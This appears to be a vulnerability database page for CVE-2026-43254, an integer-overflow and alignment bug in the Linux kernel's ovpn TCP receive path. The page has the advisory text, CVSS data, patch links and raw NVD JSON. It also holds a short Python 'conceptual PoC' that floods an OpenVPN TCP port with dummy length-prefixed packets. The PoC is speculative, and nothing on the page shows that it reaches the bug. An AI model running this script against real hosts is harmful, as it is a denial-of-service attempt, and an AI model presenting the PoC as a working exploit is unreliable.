CVE-2026-43254

Description

In the Linux kernel, the following vulnerability has been resolved: ovpn: tcp - fix packet extraction from stream When processing TCP stream data in ovpn_tcp_recv, we receive large cloned skbs from __strp_rcv that may contain multiple coalesced packets. The current implementation has two bugs: 1. Header offset overflow: Using pskb_pull with large offsets on coalesced skbs causes skb->data - skb->head to exceed the u16 storage of skb->network_header. This causes skb_reset_network_header to fail on the inner decapsulated packet, resulting in packet drops. 2. Unaligned protocol headers: Extracting packets from arbitrary positions within the coalesced TCP stream provides no alignment guarantees for the packet data causing performance penalties on architectures without efficient unaligned access. Additionally, openvpn's 2-byte length prefix on TCP packets causes the subsequent 4-byte opcode and packet ID fields to be inherently misaligned. Fix both issues by allocating a new skb for each openvpn packet and using skb_copy_bits to extract only the packet content into the new buffer, skipping the 2-byte length prefix. Also, check the length before invoking the function that performs the allocation to avoid creating an invalid skb. If the packet has to be forwarded to userspace the 2-byte prefix can be pushed to the head safely, without misalignment. As a side effect, this approach also avoids the expensive linearization that pskb_pull triggers on cloned skbs with page fragments. In testing, this resulted in TCP throughput improvements of up to 74%.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE

Linux Kernel (Versions prior to patches in stable branches for ovpn/tcp.c)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

# This is a conceptual PoC for CVE-2026-43254
# It simulates sending a stream of OpenVPN TCP packets
# that might trigger the coalescing and offset issues
# on a vulnerable Linux kernel running the ovpn module.

def create_ovpn_packet(length):
    # OpenVPN TCP packet has a 2-byte length prefix
    header = struct.pack('!H', length)
    # Fill with dummy data
    payload = b'A' * length
    return header + payload

def send_malicious_stream(target_ip, target_port):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))
        
        # Send a large number of packets to encourage coalescing (TSO/GRO)
        # and potentially trigger the offset overflow or alignment issues.
        for i in range(10000):
            # Use a specific packet size if necessary to trigger alignment issues
            # The vulnerability description mentions 2-byte prefix causing misalignment
            # of subsequent fields.
            pkt = create_ovpn_packet(1400) 
            s.sendall(pkt)
            
        print("[+] Stream sent to target.")
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    TARGET_IP = "127.0.0.1" # Replace with target IP
    TARGET_PORT = 1194      # Default OpenVPN TCP port
    send_malicious_stream(TARGET_IP, TARGET_PORT)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43254
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43254
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43254/
[4] VulDB https://vuldb.com/cve/CVE-2026-43254
[5] https://git.kernel.org/stable/c/0315bec883c67fa1413c61e504a28dc5bd02eb37
[6] https://git.kernel.org/stable/c/7dba6cd7fb168d7615194a631c9c100c1c224131
[7] https://git.kernel.org/stable/c/d4f687fbbce45b5e88438e89b5e26c0c15847992

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43254", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:46.143", "lastModified": "2026-05-11T18:21:13.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\novpn: tcp - fix packet extraction from stream\n\nWhen processing TCP stream data in ovpn_tcp_recv, we receive large\ncloned skbs from __strp_rcv that may contain multiple coalesced packets.\nThe current implementation has two bugs:\n\n1. Header offset overflow: Using pskb_pull with large offsets on\n coalesced skbs causes skb->data - skb->head to exceed the u16 storage\n of skb->network_header. This causes skb_reset_network_header to fail\n on the inner decapsulated packet, resulting in packet drops.\n\n2. Unaligned protocol headers: Extracting packets from arbitrary\n positions within the coalesced TCP stream provides no alignment\n guarantees for the packet data causing performance penalties on\n architectures without efficient unaligned access. Additionally,\n openvpn's 2-byte length prefix on TCP packets causes the subsequent\n 4-byte opcode and packet ID fields to be inherently misaligned.\n\nFix both issues by allocating a new skb for each openvpn packet and\nusing skb_copy_bits to extract only the packet content into the new\nbuffer, skipping the 2-byte length prefix. Also, check the length before\ninvoking the function that performs the allocation to avoid creating an\ninvalid skb.\n\nIf the packet has to be forwarded to userspace the 2-byte prefix can be\npushed to the head safely, without misalignment.\n\nAs a side effect, this approach also avoids the expensive linearization\nthat pskb_pull triggers on cloned skbs with page fragments. In testing,\nthis resulted in TCP throughput improvements of up to 74%."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.16", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4562EDA-AFEA-4C62-97CC-C83E109A5F19"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0315bec883c67fa1413c61e504a28dc5bd02eb37", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7dba6cd7fb168d7615194a631c9c100c1c224131", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d4f687fbbce45b5e88438e89b5e26c0c15847992", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}